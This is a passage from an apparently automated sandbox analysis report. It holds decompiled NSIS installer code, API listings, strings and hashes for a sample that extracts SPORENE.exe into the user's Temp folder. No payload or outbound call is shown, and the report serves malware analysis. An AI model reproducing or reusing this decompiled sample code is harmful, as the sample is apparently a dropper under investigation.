                					if(_v8 == _t82) {
                						L28:
                						_t34 =  &_v24; // 0x40387d
                						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                						_t94 = _t53;
                						E004034E5( *0x434f14 + 0x1c);
                						_t35 =  &_v24; // 0x40387d
                						_push( *_t35);
                						_push(_t94);
                						_push(_t82);
                						_push(0xffffffff); // executed
                						_t57 = E004032B4(); // executed
                						if(_t57 == _v24) {
                							 *0x434f10 = _t94;
                							 *0x434f18 =  *_t94;
                							if((_v44 & 0x00000001) != 0) {
                								 *0x434f1c =  *0x434f1c + 1;
                							}
                							_t40 = _t94 + 0x44; // 0x44
                							_t59 = _t40;
                							_t85 = 8;
                							do {
                								_t59 = _t59 - 8;
                								 *_t59 =  *_t59 + _t94;
                								_t85 = _t85 - 1;
                							} while (_t85 != 0);
                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                							 *(_t94 + 0x3c) = _t60;
                							E00405FE8(0x434f20, _t94 + 4, 0x40);
                							return 0;
                						}
                						goto L29;
                					}
                					E004034E5( *0x41ea18);
                					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                						goto L29;
                					} else {
                						goto L28;
                					}
                				} else {
                					do {
                						_t90 = _t93;
                						asm("sbb eax, eax");
                						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                						if(_t93 >= _t70) {
                							_t90 = _t70;
                						}
                						if(E004034CF(0x416a18, _t90) == 0) {
                							E00403019(1);
                							L29:
                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                						}
                						if( *0x434f14 != 0) {
                							if((_a4 & 0x00000002) == 0) {
                								E00403019(0);
                							}
                							goto L20;
                						}
                						E00405FE8( &_v44, 0x416a18, 0x1c);
                						_t77 = _v44;
                						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                							_a4 = _a4 | _t77;
                							_t87 =  *0x41ea18; // 0x1ffd3
                							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                							_t80 = _v20;
                							 *0x434f14 = _t87;
                							if(_t80 > _t93) {
                								goto L29;
                							}
                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                								_v8 = _v8 + 1;
                								_t93 = _t80 - 4;
                								if(_t90 > _t93) {
                									_t90 = _t93;
                								}
                								goto L20;
                							} else {
                								break;
                							}
                						}
                						L20:
                						if(_t93 <  *0x42aa24) {
                							_v12 = E004069F7(_v12, 0x416a18, _t90);
                						}
                						 *0x41ea18 =  *0x41ea18 + _t90;
                						_t93 = _t93 - _t90;
                					} while (_t93 != 0);
                					_t82 = 0;
                					goto L24;
                				}
                			}




























                0x00403085
                0x00403088
                0x0040308b
                0x004030a5
                0x004030aa
                0x004030bd
                0x004030c2
                0x004030c5
                0x004030cb
                0x00000000
                0x004030cd
                0x004030d8
                0x004030de
                0x004030ef
                0x004030f6
                0x004030fe
                0x00403103
                0x00403105
                0x004031f0
                0x004031f2
                0x004031fe
                0x00000000
                0x00000000
                0x00403203
                0x00403227
                0x00403227
                0x0040322c
                0x00403232
                0x0040323d
                0x00403242
                0x00403242
                0x00403245
                0x00403246
                0x00403247
                0x00403249
                0x00403251
                0x00403268
                0x00403270
                0x00403275
                0x00403277
                0x00403277
                0x0040327f
                0x0040327f
                0x00403282
                0x00403283
                0x00403283
                0x00403286
                0x00403288
                0x00403288
                0x00403292
                0x00403298
                0x004032a6
                0x00000000
                0x004032ab
                0x00000000
                0x00403251
                0x0040320b
                0x0040321d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040310b
                0x00403110
                0x00403115
                0x00403119
                0x00403120
                0x00403127
                0x00403129
                0x00403129
                0x00403134
                0x0040325c
                0x00403253
                0x00000000
                0x00403253
                0x00403141
                0x004031c1
                0x004031c5
                0x004031ca
                0x00000000
                0x004031c1
                0x0040314a
                0x0040314f
                0x00403157
                0x0040317d
                0x00403183
                0x0040318c
                0x00403192
                0x00403197
                0x0040319d
                0x00000000
                0x00000000
                0x004031a7
                0x004031af
                0x004031b2
                0x004031b7
                0x004031b9
                0x004031b9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004031a7
                0x004031cb
                0x004031d1
                0x004031dd
                0x004031dd
                0x004031e0
                0x004031e6
                0x004031e6
                0x004031ee
                0x00000000
                0x004031ee

                APIs
                • GetTickCount.KERNEL32 ref: 0040308E
                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                • API String ID: 2803837635-1700931469
                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                				signed int _v8;
                				int _v12;
                				intOrPtr _v16;
                				long _v20;
                				intOrPtr _v24;
                				short _v152;
                				void* _t65;
                				long _t70;
                				intOrPtr _t75;
                				long _t76;
                				void* _t78;
                				int _t88;
                				intOrPtr _t92;
                				intOrPtr _t95;
                				long _t96;
                				signed int _t97;
                				int _t98;
                				int _t99;
                				void* _t101;
                				void* _t102;
                
                				_t97 = _a16;
                				_t92 = _a12;
                				_v12 = _t97;
                				if(_t92 == 0) {
                					_v12 = 0x8000;
                				}
                				_v8 = _v8 & 0x00000000;
                				_v16 = _t92;
                				if(_t92 == 0) {
                					_v16 = 0x422a20;
                				}
                				_t62 = _a4;
                				if(_a4 >= 0) {
                					E004034E5( *0x434f58 + _t62);
                				}
                				if(E004034CF( &_a16, 4) == 0) {
                					L41:
                					_push(0xfffffffd);
                					goto L42;
                				} else {
                					if((_a19 & 0x00000080) == 0) {
                						if(_t92 != 0) {
                							if(_a16 < _t97) {
                								_t97 = _a16;
                							}
                							if(E004034CF(_t92, _t97) != 0) {
                								_v8 = _t97;
                								L44:
                								return _v8;
                							} else {
                								goto L41;
                							}
                						}
                						if(_a16 <= _t92) {
                							goto L44;
                						}
                						_t88 = _v12;
                						while(1) {
                							_t98 = _a16;
                							if(_a16 >= _t88) {
                								_t98 = _t88;
                							}
                							if(E004034CF(0x41ea20, _t98) == 0) {
                								goto L41;
                							}
                							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                								L28:
                								_push(0xfffffffe);
                								L42:
                								_pop(_t65);
                								return _t65;
                							}
                							_v8 = _v8 + _t98;
                							_a16 = _a16 - _t98;
                							if(_a16 > 0) {
                								continue;
                							}
                							goto L44;
                						}
                						goto L41;
                					}
                					_t70 = GetTickCount();
                					 *0x40d384 =  *0x40d384 & 0x00000000;
                					 *0x40d380 =  *0x40d380 & 0x00000000;
                					_t14 =  &_a16;
                					 *_t14 = _a16 & 0x7fffffff;
                					_v20 = _t70;
                					 *0x40ce68 = 8;
                					 *0x416a10 = 0x40ea08;
                					 *0x416a0c = 0x40ea08;
                					 *0x416a08 = 0x416a08;
                					_a4 = _a16;
                					if( *_t14 <= 0) {
                						goto L44;
                					} else {
                						goto L9;
                					}
                					while(1) {
                						L9:
                						_t99 = 0x4000;
                						if(_a16 < 0x4000) {
                							_t99 = _a16;
                						}
                						if(E004034CF(0x41ea20, _t99) == 0) {
                							goto L41;
                						}
                						_a16 = _a16 - _t99;
                						 *0x40ce58 = 0x41ea20;
                						 *0x40ce5c = _t99;
                						while(1) {
                							_t95 = _v16;
                							 *0x40ce60 = _t95;
                							 *0x40ce64 = _v12;
                							_t75 = E00406A65(0x40ce58);
                							_v24 = _t75;
                							if(_t75 < 0) {
                								break;
                							}
                							_t101 =  *0x40ce60 - _t95;
                							_t76 = GetTickCount();
                							_t96 = _t76;
                							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                								_t102 = _t102 + 0xc;
                								E0040559F(0,  &_v152);
                								_v20 = _t96;
                							}
                							if(_t101 == 0) {
                								if(_a16 > 0) {
                									goto L9;
                								}
                								goto L44;
                							} else {
                								if(_a12 != 0) {
                									_v8 = _v8 + _t101;
                									_v12 = _v12 - _t101;
                									_v16 =  *0x40ce60;
                									L23:
                									if(_v24 != 1) {
                										continue;
                									}
                									goto L44;
                								}
                								_t78 = E004060DF(_a8, _v16, _t101); // executed
                								if(_t78 == 0) {
                									goto L28;
                								}
                								_v8 = _v8 + _t101;
                								goto L23;
                							}
                						}
                						_push(0xfffffffc);
                						goto L42;
                					}
                					goto L41;
                				}
                			}























                0x004032bf
                0x004032c3
                0x004032c6
                0x004032cb
                0x004032cd
                0x004032cd
                0x004032d4
                0x004032d8
                0x004032dd
                0x004032df
                0x004032df
                0x004032e6
                0x004032eb
                0x004032f6
                0x004032f6
                0x00403308
                0x004034bd
                0x004034bd
                0x00000000
                0x0040330e
                0x00403312
                0x0040346a
                0x004034ad
                0x004034af
                0x004034af
                0x004034bb
                0x004034c2
                0x004034c5
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004034bb
                0x0040346f
                0x00000000
                0x00000000
                0x00403471
                0x00403474
                0x00403477
                0x0040347a
                0x0040347c
                0x0040347c
                0x0040348c
                0x00000000
                0x00000000
                0x0040349a
                0x00403464
                0x00403464
                0x004034bf
                0x004034bf
                0x00000000
                0x004034bf
                0x0040349c
                0x0040349f
                0x004034a6
                0x00000000
                0x00000000
                0x00000000
                0x004034a8
                0x00000000
                0x00403474
                0x0040331e
                0x00403320
                0x00403327
                0x0040332e
                0x0040332e
                0x00403335
                0x0040333d
                0x00403347
                0x0040334c
                0x00403354
                0x0040335e
                0x00403361
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00403367
                0x00403367
                0x00403367
                0x0040336f
                0x00403371
                0x00403371
                0x00403382
                0x00000000
                0x00000000
                0x00403388
                0x0040338b
                0x00403391
                0x00403397
                0x00403397
                0x004033a2
                0x004033a8
                0x004033ad
                0x004033b4
                0x004033b7
                0x00000000
                0x00000000
                0x004033c3
                0x004033c5
                0x004033ce
                0x004033d0
                0x00403401
                0x00403407
                0x00403413
                0x00403418
                0x00403418
                0x0040341d
                0x00403458
                0x00000000
                0x00000000
                0x00000000
                0x0040341f
                0x00403423
                0x0040343f
                0x00403442
                0x00403445
                0x00403448
                0x0040344c
                0x00000000
                0x00000000
                0x00000000
                0x00403452
                0x0040342c
                0x00403433
                0x00000000
                0x00000000
                0x00403435
                0x00000000
                0x00403435
                0x0040341d
                0x00403460
                0x00000000
                0x00403460
                0x00000000
                0x00403367

                APIs
                Strings
                • }8@, xrefs: 004032B4
                • ... %d%%, xrefs: 004033FB
                • UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU, xrefs: 00403374, 0040337A, 0040347E, 00403484, 0040348F
                • *B, xrefs: 004032DF
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountTick$wsprintf
                • String ID: *B$... %d%%$UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU$}8@
                • API String ID: 551687249-1562186087
                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E0040176F(FILETIME* __ebx, void* __eflags) {
                				void* __esi;
                				void* _t35;
                				void* _t43;
                				void* _t45;
                				FILETIME* _t51;
                				FILETIME* _t64;
                				void* _t66;
                				signed int _t72;
                				FILETIME* _t73;
                				FILETIME* _t77;
                				signed int _t79;
                				WCHAR* _t81;
                				void* _t83;
                				void* _t84;
                				void* _t86;
                
                				_t77 = __ebx;
                				 *(_t86 - 8) = E00402DA6(0x31);
                				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                				_t35 = E00405E83( *(_t86 - 8));
                				_push( *(_t86 - 8));
                				_t81 = L"C:\\Users";
                				if(_t35 == 0) {
                					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                				} else {
                					E0040653D();
                				}
                				E004067C4(_t81);
                				while(1) {
                					__eflags =  *(_t86 + 8) - 3;
                					if( *(_t86 + 8) >= 3) {
                						_t66 = E00406873(_t81);
                						_t79 = 0;
                						__eflags = _t66 - _t77;
                						if(_t66 != _t77) {
                							_t73 = _t66 + 0x14;
                							__eflags = _t73;
                							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                						}
                						asm("sbb eax, eax");
                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                						__eflags = _t72;
                						 *(_t86 + 8) = _t72;
                					}
                					__eflags =  *(_t86 + 8) - _t77;
                					if( *(_t86 + 8) == _t77) {
                						E00406008(_t81);
                					}
                					__eflags =  *(_t86 + 8) - 1;
                					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                					__eflags = _t43 - 0xffffffff;
                					 *(_t86 - 0x38) = _t43;
                					if(_t43 != 0xffffffff) {
                						break;
                					}
                					__eflags =  *(_t86 + 8) - _t77;
                					if( *(_t86 + 8) != _t77) {
                						E0040559F(0xffffffe2,  *(_t86 - 8));
                						__eflags =  *(_t86 + 8) - 2;
                						if(__eflags == 0) {
                							 *((intOrPtr*)(_t86 - 4)) = 1;
                						}
                						L31:
                						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                						__eflags =  *0x434f88;
                						goto L32;
                					} else {
                						E0040653D(0x40b5f0, _t83);
                						E0040653D(_t83, _t81);
                						E0040657A(_t77, _t81, _t83, "C:\Users\engineer\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                						E0040653D(_t83, 0x40b5f0);
                						_t64 = E00405B9D("C:\Users\engineer\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                						__eflags = _t64;
                						if(_t64 == 0) {
                							continue;
                						} else {
                							__eflags = _t64 == 1;
                							if(_t64 == 1) {
                								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                								L32:
                								_t51 = 0;
                								__eflags = 0;
                							} else {
                								_push(_t81);
                								_push(0xfffffffa);
                								E0040559F();
                								L29:
                								_t51 = 0x7fffffff;
                							}
                						}
                					}
                					L33:
                					return _t51;
                				}
                				E0040559F(0xffffffea,  *(_t86 - 8));
                				 *0x434fb4 =  *0x434fb4 + 1;
                				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                				 *0x434fb4 =  *0x434fb4 - 1;
                				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                				_t84 = _t45;
                				if( *(_t86 - 0x24) != 0xffffffff) {
                					L22:
                					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                				} else {
                					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                						goto L22;
                					}
                				}
                				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                				__eflags = _t84 - _t77;
                				if(_t84 >= _t77) {
                					goto L31;
                				} else {
                					__eflags = _t84 - 0xfffffffe;
                					if(_t84 != 0xfffffffe) {
                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                					} else {
                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                						lstrcatW(_t81,  *(_t86 - 8));
                					}
                					_push(0x200010);
                					_push(_t81);
                					E00405B9D();
                					goto L29;
                				}
                				goto L33;
                			}


















                0x0040176f
                0x00401776
                0x00401782
                0x00401785
                0x0040178a
                0x0040178d
                0x00401794
                0x004017b0
                0x00401796
                0x00401797
                0x00401797
                0x004017b6
                0x004017bb
                0x004017bb
                0x004017bf
                0x004017c2
                0x004017c7
                0x004017c9
                0x004017cb
                0x004017d0
                0x004017d0
                0x004017db
                0x004017db
                0x004017ec
                0x004017ee
                0x004017ee
                0x004017ef
                0x004017ef
                0x004017f2
                0x004017f5
                0x004017f8
                0x004017f8
                0x004017ff
                0x0040180e
                0x00401813
                0x00401816
                0x00401819
                0x00000000
                0x00000000
                0x0040181b
                0x0040181e
                0x00401874
                0x00401879
                0x004015b6
                0x0040292e
                0x0040292e
                0x00402c2a
                0x00402c2d
                0x00402c2d
                0x00000000
                0x00401820
                0x00401826
                0x0040182d
                0x0040183a
                0x00401845
                0x0040185b
                0x0040185b
                0x0040185e
                0x00000000
                0x00401864
                0x00401864
                0x00401865
                0x00401882
                0x00402c33
                0x00402c33
                0x00402c33
                0x00401867
                0x00401867
                0x00401868
                0x00401493
                0x0040239d
                0x0040239d
                0x0040239d
                0x00401865
                0x0040185e
                0x00402c35
                0x00402c39
                0x00402c39
                0x00401892
                0x00401897
                0x004018a5
                0x004018aa
                0x004018b0
                0x004018b4
                0x004018b6
                0x004018be
                0x004018ca
                0x004018b8
                0x004018b8
                0x004018bc
                0x00000000
                0x00000000
                0x004018bc
                0x004018d3
                0x004018d9
                0x004018db
                0x00000000
                0x004018e1
                0x004018e1
                0x004018e4
                0x004018fc
                0x004018e6
                0x004018e9
                0x004018f2
                0x004018f2
                0x00401901
                0x00401906
                0x00402398
                0x00000000
                0x00402398
                0x00000000

                APIs
                • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp\SPORENE.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\SPORENE.exe,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                  • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                  • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,747DEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                  • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                  • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                  • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\SPORENE.exe
                • API String ID: 1941528284-667802854
                • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040689A(intOrPtr _a4) {
                				short _v576;
                				signed int _t13;
                				struct HINSTANCE__* _t17;
                				signed int _t19;
                				void* _t24;
                
                				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                				if(_t13 > 0x104) {
                					_t13 = 0;
                				}
                				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                					_t19 = 1;
                				} else {
                					_t19 = 0;
                				}
                				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                				return _t17;
                			}








                0x004068b1
                0x004068ba
                0x004068bc
                0x004068bc
                0x004068c0
                0x004068d3
                0x004068cd
                0x004068cd
                0x004068cd
                0x004068ec
                0x00406900
                0x00406907

                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                • wsprintfW.USER32 ref: 004068EC
                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.364195832.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.364188833.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364207037.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.364217526.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364222666.000000000040D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364228139.0000000000411000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364237018.000000000041B000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364244028.0000000000426000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364252926.0000000000431000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364257461.0000000000440000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.364262822.000000000044C000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DirectoryLibraryLoadSystemwsprintf
                • String ID: %s%S.dll$UXTHEME$\
                • API String ID: 2200240437-1946221925
                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00401C43(intOrPtr __edx) {
                				int _t29;
                				long _t30;
                				signed int _t32;
                				WCHAR* _t35;
                				long _t36;
                				int _t41;
                				signed int _t42;
                				int _t46;
                				int _t56;
                				intOrPtr _t57;
                				struct HWND__* _t63;
                				void* _t64;
                
                				_t57 = __edx;
                				_t29 = E00402D84(3);
                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                				 *(_t64 - 0x18) = _t29;
                				_t30 = E00402D84(4);
                				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                				 *(_t64 + 8) = _t30;
                				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                				}
                				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                					 *(_t64 + 8) = E00402DA6(0x44);
                				}
                				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                				_push(1);
                				if(__eflags != 0) {
                					_t61 = E00402DA6();
                					_t32 = E00402DA6();
                					asm("sbb ecx, ecx");
                					asm("sbb eax, eax");
                					_t35 =  ~( *_t31) & _t61;
                					__eflags = _t35;
                					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                					goto L10;
                				} else {
                					_t63 = E00402D84();
                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                					_t41 = E00402D84(2);
                					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                					_t56 =  *(_t64 - 0x1c) >> 2;
                					if(__eflags == 0) {
                						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                						L10:
                						 *(_t64 - 0x38) = _t36;
                					} else {
                						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                						asm("sbb eax, eax");
                						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                					}
                				}
                				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                					_push( *(_t64 - 0x38));
